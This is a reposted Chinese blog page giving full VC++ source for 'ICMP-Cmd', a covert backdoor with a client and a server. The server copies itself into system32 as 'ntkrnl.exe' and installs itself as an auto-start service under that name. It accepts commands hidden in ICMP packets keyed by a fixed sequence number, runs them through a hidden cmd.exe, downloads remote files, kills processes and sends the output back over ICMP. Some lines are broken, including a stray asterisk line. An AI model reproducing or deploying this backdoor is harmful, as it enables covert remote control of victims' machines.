
vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序

客户端

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib,"ws2_32.lib")

char SendMsg[256];

/* The IP header (IPv4) as this program overlays it on a received packet.
 * Only h_len is actually read (decode_resp uses h_len * 4 as the header
 * length, i.e. it is counted in 32-bit words).
 * NOTE(review): the order of the two leading 4-bit fields and the offsets of
 * the fields that follow them depend on how the compiler lays out bit-fields —
 * confirm for the target toolchain before relying on any field but h_len. */
typedef struct iphdr {
unsigned int h_len:4; // 4-bit header length, in 32-bit words
unsigned int version:4; // 4-bit IP version; 4 means IPv4
unsigned char tos; // 8-bit type of service (TOS)
unsigned short total_len; // 16-bit total length (bytes)
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3 flag bits together with the fragment offset
unsigned char ttl; // 8-bit time to live (TTL)
unsigned char proto; // 8-bit protocol (TCP, UDP or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source IP address
unsigned int destIP; // 32-bit destination IP address
}IpHeader;


/* ICMP header as built by fill_icmp_data and parsed by decode_resp:
 * the 8-byte base header followed by a 4-byte timestamp, 12 bytes in all
 * (decode_resp reads the payload at offset iphdrlen + 12).
 * Detection note: i_seq is not a running counter here — the client sends a
 * fixed 1234 and only accepts replies whose i_seq is 4321, so these constant
 * sequence values distinguish this traffic from ordinary ping. */
typedef struct _ihdr
{
BYTE i_type; // 8-bit ICMP type
BYTE i_code; // 8-bit ICMP code
USHORT i_cksum; // 16-bit checksum (computed over header + payload)
USHORT i_id; // identifier; this program stores the current process id
USHORT i_seq; // sequence number; used as a fixed recognition token (see above)
ULONG timestamp; // timestamp (GetTickCount at fill time)
} IcmpHeader;

#define STATUS_FAILED 0xFFFF
 
#define MAX_PACKET 2000
char arg[1450];

#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))


void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);

void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);

int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; //目标主机的IP
char *recvbuf;

if(argc!=2)
 {
  usage(argv[0]);
  return 0;
 }

ICMP_DEST_IP=argv[1];//取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);

char *icmp_data;


if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d/n", GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;

usage(argv[0]);
__try{
for(;;){

printf("ICMP-CMD>");
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中

if(!strcmp(SendMsg,"Q/n")||!strcmp(SendMsg,"q/n"))ExitProcess(0);
if(!strcmp(SendMsg,"/n"))continue;
if(!strcmp(SendMsg,"H/n")||!strcmp(SendMsg,"h/n")){help();continue;}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("/nFileName Error. Use /"-FileName/"/n");continue;}

datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);

int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));

if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n");
fprintf(stderr,"sendto failed: %d/n",WSAGetLastError());

}

if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。

return 0;

}

printf("/nSend Packet to %s Success!/n",argv[1]);

DWORD start = GetTickCount();
for(;;){

if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out/n");
break;
}

fprintf(stderr, "recvfrom failed: %d/n", WSAGetLastError());
break;
}

decode_resp(recvbuf, bread, &from);
}
}//end for

}//end try


__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}

return 0;
}


/* Standard Internet one's-complement checksum (RFC 1071) over `size` bytes
 * starting at `buffer`.  The data is summed as 16-bit units in host byte
 * order, a trailing odd byte is added on its own, the carries are folded back
 * into the low 16 bits, and the result is inverted.  The caller must zero the
 * header's own checksum field before calling this.
 *
 * buffer: start of the data, read as 16-bit units
 * size:   number of bytes to cover (expected to be non-negative)
 * returns the 16-bit value to store in the checksum field; checksumming the
 *         data again with that value in place yields 0.
 */
USHORT checksum(USHORT *buffer, int size)
{
unsigned long sum = 0;
int remaining = size;

/* Whole 16-bit words. */
for (; remaining > 1; remaining -= (int)sizeof(USHORT))
{
sum += *buffer;
buffer++;
}

/* Odd trailing byte, if any. */
if (remaining)
{
sum += *(unsigned char *)buffer;
}

/* Fold the 32-bit sum into 16 bits; the first fold may carry again. */
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (USHORT)(~sum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr= (IcmpHeader *)icmp_data;
icmp_hdr->i_type=0;
icmp_hdr->i_code=0;
icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
icmp_hdr->timestamp =GetTickCount();
icmp_hdr->i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));

}

void usage(char * prog)
{
 printf("/t/t=====Welcome to www.hackerxfiles.net======/n");
 printf("/n");
    printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---/n");
 printf("/t/t---[ E-mail:    gxisone@hotmail.com   ]---/n");
 printf("/t/t---[                      2003/8/15   ]---/n");
 printf("/t/tusage: %s RemoteIP/n",prog);
 printf("/t/tCtrl+C or Q/q to Quite        H/h for help/n");
}


void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{
memset(arg,0,sizeof(arg));
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==4321)//密码正确则输出数据段
{
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
printf(" IcmpType %d",icmphdr->i_type);
printf(" IcmpCode %d",icmphdr->i_code);
printf("/n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
}

else printf("Other ICMP Packets!/n");

}

void help(void)
{
 printf("/n");
 printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is system32)/n");
 printf("[pslist]        (List the Process)/n");
 printf("[pskill ID]     (Kill the Process)/n");
 printf("Command         (run the command)/n");
 printf("/n");


}

服务端

#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h>
#include <tlhelp32.h>
#include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
                  
#define ICMP_PASSWORD 1234                                            
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))


/* The IP header (IPv4) as this program overlays it on a received packet.
 * Only h_len is actually read (decode_resp uses h_len * 4 as the header
 * length, i.e. it is counted in 32-bit words).
 * NOTE(review): the order of the two leading 4-bit fields and the offsets of
 * the fields that follow them depend on how the compiler lays out bit-fields —
 * confirm for the target toolchain before relying on any field but h_len. */
typedef struct iphdr {
unsigned int h_len:4; // 4-bit header length, in 32-bit words
unsigned int version:4; // 4-bit IP version; 4 means IPv4
unsigned char tos; // 8-bit type of service (TOS)
unsigned short total_len; // 16-bit total length (bytes)
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3 flag bits together with the fragment offset
unsigned char ttl; // 8-bit time to live (TTL)
unsigned char proto; // 8-bit protocol (TCP, UDP or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source IP address
unsigned int destIP; // 32-bit destination IP address
}IpHeader;


// ICMP header as built by fill_icmp_data and parsed by decode_resp:
// the 8-byte base header followed by a 4-byte timestamp, 12 bytes in all
// (decode_resp reads the payload at offset iphdrlen + 12).
// Detection note: i_seq is not a running counter here — this side only acts
// on packets whose i_seq equals ICMP_PASSWORD (1234) and stamps 4321 into its
// replies, so these constant sequence values distinguish this traffic from
// ordinary ping.
typedef struct _ihdr
{
BYTE i_type; // 8-bit ICMP type
BYTE i_code; // 8-bit ICMP code
USHORT i_cksum; // 16-bit checksum (computed over header + payload)
USHORT i_id; // identifier; this program stores the current process id
USHORT i_seq; // sequence number; used as a fixed recognition token (see above)
ULONG timestamp; // timestamp (GetTickCount at fill time)
}IcmpHeader;

char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);

HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;

void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
void  WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void  InstallCmdService(void);
void  RemoveCmdService(void);
void  usage(char *par);

int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};

if(argc==2)
 {
  if(!stricmp(argv[1],"-install"))
  {
   usage(argv[0]);
   InstallCmdService();
  }
  else if(!stricmp(argv[1],"-remove"))
  {
   usage(argv[0]);
   RemoveCmdService();
  }
     else usage(argv[0]);
  return 0;
 }
else usage(argv[0]);

StartServiceCtrlDispatcher(DispatchTable);

return 0;
}

void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
 HANDLE    hThread;

ServiceStatus.dwServiceType             = SERVICE_WIN32;
 ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
 ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 ServiceStatus.dwServiceSpecificExitCode = 0;
 ServiceStatus.dwWin32ExitCode           = 0;
 ServiceStatus.dwCheckPoint              = 0;
 ServiceStatus.dwWaitHint                = 0;

ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
 if(ServiceStatusHandle==0)
 {
  OutputDebugString("RegisterServiceCtrlHandler Error !/n");
  return ;
 }

ServiceStatus.dwCurrentState = SERVICE_RUNNING;
 ServiceStatus.dwCheckPoint   = 0;
 ServiceStatus.dwWaitHint     = 0;
 
 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdStart Error !/n");
  return ;
 }

hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
 if(hThread==NULL)
 {
  OutputDebugString("CreateThread in CmdStart Error !/n");
 }

return ;
}

void WINAPI CmdControl(DWORD dwCode)
{
 switch(dwCode)
 {
 case SERVICE_CONTROL_PAUSE:
  ServiceStatus.dwCurrentState = SERVICE_PAUSED;
  break;

case SERVICE_CONTROL_CONTINUE:
  ServiceStatus.dwCurrentState = SERVICE_RUNNING;
  break;

case SERVICE_CONTROL_STOP:     
  WaitForSingleObject(hMutex,INFINITE);

ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
  ServiceStatus.dwWin32ExitCode = 0;
  ServiceStatus.dwCheckPoint    = 0;
  ServiceStatus.dwWaitHint      = 0;
  if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
  {
   OutputDebugString("SetServiceStatus in CmdControl in Switch Error !/n");
  }

ReleaseMutex(hMutex);
  CloseHandle(hMutex);
  return ;

case SERVICE_CONTROL_INTERROGATE:
  break;

default:
  break;
 }

if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdControl out Switch Error !/n");
 }

return ;
}

DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
{  
char *icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof(from);
int timeout = 2000;
char *recvbuf;

if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
  {
   printf("WSAStartup failed: %s/n",retval);
   ExitProcess(STATUS_FAILED);
  }

sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
  if (sockRaw == INVALID_SOCKET)
  {
   printf("WSASocket() failed: %s/n",WSAGetLastError());
   ExitProcess(STATUS_FAILED);
  }
__try{
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));

if(bread == SOCKET_ERROR) __leave;


memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
datasize=0;
datasize += sizeof(IcmpHeader);
icmp_data =(char*)xmalloc(MAX_PACKET);
recvbuf = (char*)xmalloc(MAX_PACKET);
if (!icmp_data) {
//fprintf(stderr,"HeapAlloc failed %d/n",GetLastError());
__leave;
}
memset(icmp_data,0,MAX_PACKET);
for(;;) {

int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));

bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)continue;

__leave;

}
decode_resp(recvbuf,bread,&from);
Sleep(200);
memset(recvbuf,0,sizeof(recvbuf));
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
 return 0;
}


void InstallCmdService(void)
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpCurrentPath[MAX_PATH];
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
    WIN32_FIND_DATA  FileData;
 HANDLE           hSearch;
 DWORD            dwErrorCode;
 SERVICE_STATUS   InstallServiceStatus;


  GetSystemDirectory(lpImagePath,MAX_PATH);
  strcat(lpImagePath,"//ntkrnl.exe");
        lpHostName=NULL;
 
 printf("Transmitting File ... ");
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
  if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
  {
   dwErrorCode=GetLastError();
   if(dwErrorCode==5)
   {
    printf("Failure ... Access is Denied !/n");        
   }
   else
   {
    printf("Failure !/n");
   }
       return ;
  }
     else
  {
      printf("Success !/n");
  }
 }
 else
 {
  printf("already Exists !/n");
  FindClose(hSearch);
 }

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
 {
  printf("Open Service Control Manager Database Failure !/n");
  return ;
 }

printf("Creating Service .... ");
 schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
                       SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
 if(schService==NULL)
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode!=ERROR_SERVICE_EXISTS)
  {
        printf("Failure !/n");
   CloseServiceHandle(schSCManager);
         return ;
  }
  else
  {
   printf("already Exists !/n");
   schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
   if(schService==NULL)
   {
    printf("Opening Service .... Failure !/n");
    CloseServiceHandle(schSCManager);
    return ;
   }
  }
 }
 else
 {
  printf("Success !/n");
 }

printf("Starting Service .... ");
 if(StartService(schService,0,NULL)==0)                        
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
  {
   printf("already Running !/n");
         CloseServiceHandle(schSCManager); 
          CloseServiceHandle(schService);
          return ;
  }
 }
 else
 {
  printf("Pending ... ");
 }

while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)          
 {
  if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
  {
   Sleep(100);
  }
  else
  {
   break;
  }
 }
 if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
 {
  printf("Failure !/n");                      
 }
 else
 {
  printf("Success !/n");
 }

CloseServiceHandle(schSCManager);
 CloseServiceHandle(schService);
 return ;
}

void RemoveCmdService(void)
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
    WIN32_FIND_DATA  FileData;
 SERVICE_STATUS   RemoveServiceStatus;
 HANDLE           hSearch;
 DWORD            dwErrorCode;


  GetSystemDirectory(lpImagePath,MAX_PATH);
  strcat(lpImagePath,"//ntkrnl.exe");
        lpHostName=NULL;

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
 {
  printf("Opening SCM ......... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode!=5)
  {
   printf("Failure !/n");
  }
  else
  {
   printf("Failuer ... Access is Denied !/n");
  }
  return ;
 }

schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
 if(schService==NULL)
 {
     printf("Opening Service ..... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode==1060)
  {
   printf("no Exists !/n");
  }
  else
  {
   printf("Failure !/n");
  }
  CloseServiceHandle(schSCManager);
 }
 else
 {
  printf("Stopping Service .... ");
      if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
  {
         if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
   {
           printf("already Stopped !/n");
   }
       else
   {
    printf("Pending ... ");
        if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
    {
          while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)        
     {
         Sleep(10);
         QueryServiceStatus(schService,&RemoveServiceStatus);
     }
          if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
     {
           printf("Success !/n");
     }
          else
     {
         printf("Failure !/n");
     }
    }
    else
    {
     printf("Failure !/n");         
    }
   }
  }
     else
  {
      printf("Query Failure !/n");
  }

printf("Removing Service .... ");    
       if(DeleteService(schService)==0)
  {
        printf("Failure !/n");  
  }
      else
  {
        printf("Success !/n");
  }
 }

CloseServiceHandle(schSCManager);       
 CloseServiceHandle(schService);

printf("Removing File ....... ");
 Sleep(1500);
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  printf("no Exists !/n");
 }
 else
 {
  if(DeleteFile(lpImagePath)==0)
  {
   printf("Failure !/n");              
  }
  else
  {
   printf("Success !/n");
  }
  FindClose(hSearch);
 }

return ;
}

void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{


IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
{

ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址

memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
{
 killps(atoi(strstr(arg," ")));
 memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
 send();
}

else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"remove/n"))
{
 RemoveCmdService();
 memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
 send();
 return;
}
************    http下载   *************
else if (!memcmp(arg,"http://",7))  
{
 if(char *FileName=strstr(arg,"-"))
 {
 
  char url[200];//保存网址的数组
  memset(url,0,200);
  memcpy(url,arg,int(FileName-arg-1));
  char fname[MAX_PATH];
  GetSystemDirectory(fname,MAX_PATH);
  FileName++;
  strcat(fname,"//");
  strcat(fname,FileName);
  *strstr(fname,"/n")=NULL;
  HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
  memset(buffer,0,sizeof(buffer));
  if(hRet==S_OK) memcpy(buffer,"Download OK!/n",sizeof("Download OK/n"));
  else
   memcpy(buffer,"Download Failure!/n",sizeof("Download Failure!/n"));
  send();
  return;
 }
}
//*******************************************
else{

SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
  printf("Error On CreatePipe()");
     return;
  }


STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);

strcat(cmdline,"//cmd.exe /c");

strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
        printf("Error on CreateProcess()");
        return;
}
  CloseHandle(hWrite);
       
 
DWORD bytesRead;

for(;;){
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
Sleep(200);
}
//printf("%s",buffer);
/
 //发送输出数据

send();

}


}
//else printf("Other ICMP Packets!/n");
//printf(endl;
}


/* Standard Internet one's-complement checksum (RFC 1071) over `size` bytes
 * starting at `buffer`: sum the data as 16-bit units in host byte order, add
 * a trailing odd byte on its own, fold the carries back into 16 bits and
 * invert.  The checksum field itself must be zero when this is called.
 *
 * buffer: start of the data, read as 16-bit units
 * size:   number of bytes to cover (expected to be non-negative)
 * returns the 16-bit value for the checksum field; re-checksumming the data
 *         with that value in place gives 0.
 */
USHORT checksum(USHORT *buffer, int size)
{
unsigned long acc = 0;
USHORT *cur = buffer;
int left = size;

while (left > 1) {
/* One full 16-bit word. */
acc += *cur++;
left -= (int)sizeof(USHORT);
}

if (left) {
/* A single trailing byte. */
acc += *(unsigned char *)cur;
}

/* Carry folding: the first fold can itself produce a carry. */
acc = (acc >> 16) + (acc & 0xffff);
acc += acc >> 16;
return (USHORT)~acc;
}


void fill_icmp_data(char * icmp_data)
{

IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr = (IcmpHeader*)icmp_data;
icmp_hdr->i_type = 0;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq =4321;
icmp_hdr->timestamp = GetTickCount(); //设置时间戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}

void  usage(char *par)
{

printf("/t/t=====Welcome to www.hackerxfiles.net======/n");
 printf("/n");
 printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---/n");
 printf("/t/t---[ E-mail: gxisone@hotmail.com      ]---/n");
 printf("/t/t---[                        2003/8/15 ]---/n");
 printf("/n");
 printf("/t/tUsage: %s -install (to install service)/n",par);
 printf("/t/t       %s -remove (to remove service)/n",par);
 printf("/n");

return ;


}

void send(void)
{

WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000;
char *icmp_data;

if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader);
icmp_data=(char*)xmalloc(MAX_PACKET);

if(!icmp_data) __leave;
memset(icmp_data,0,MAX_PACKET);

fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文

if (bwrote == SOCKET_ERROR)
{
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n");
//printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}

//printf("Send Packet to %s Success!/n"<<ICMP_DEST_IP<<endl;
}


__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer,0,sizeof(buffer));
Sleep(200);

}

void pslist(void)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
{
printf("/nCreateToolhelp32Snapshot() failed:%d",GetLastError());
return ;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("/nProcessName     ProcessID");
if (Process32First(hProcessSnap, &pe32))
{
 char a[5];

do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer,"/t/t");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"/n");
//printf("/n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, &pe32));

}
else
{
 printf("/nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
return;
}

BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;

if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("/nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u/n", GetLastError() );
return FALSE;
}
return TRUE;
}

BOOL killps(DWORD id)//杀进程函数
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{

if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("/nOpen Current Process Token failed:%d",GetLastError());
__leave;
}
//printf("/nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf("/nSetPrivilege ok!");

if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("/nOpen Process %d failed:%d",id,GetLastError());
__leave;
}
//printf("/nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
{
printf("/nTerminateProcess failed:%d",GetLastError());
__leave;
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}

转载于:https://www.cnblogs.com/yincheng01/archive/2009/03/29/2213346.html
